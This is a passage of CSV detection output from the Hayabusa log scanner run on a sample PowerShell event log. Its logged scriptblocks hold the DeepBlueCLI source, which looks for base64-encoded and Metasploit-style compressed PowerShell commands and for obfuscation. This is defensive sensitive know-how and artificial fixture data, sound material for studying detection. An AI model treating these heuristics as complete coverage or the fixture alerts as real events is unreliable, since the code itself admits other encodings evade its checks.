$username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.470 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} 
""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:56:34.470 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:56:34.470 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:56:34.474 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:56:34.482 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:56:34.485 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
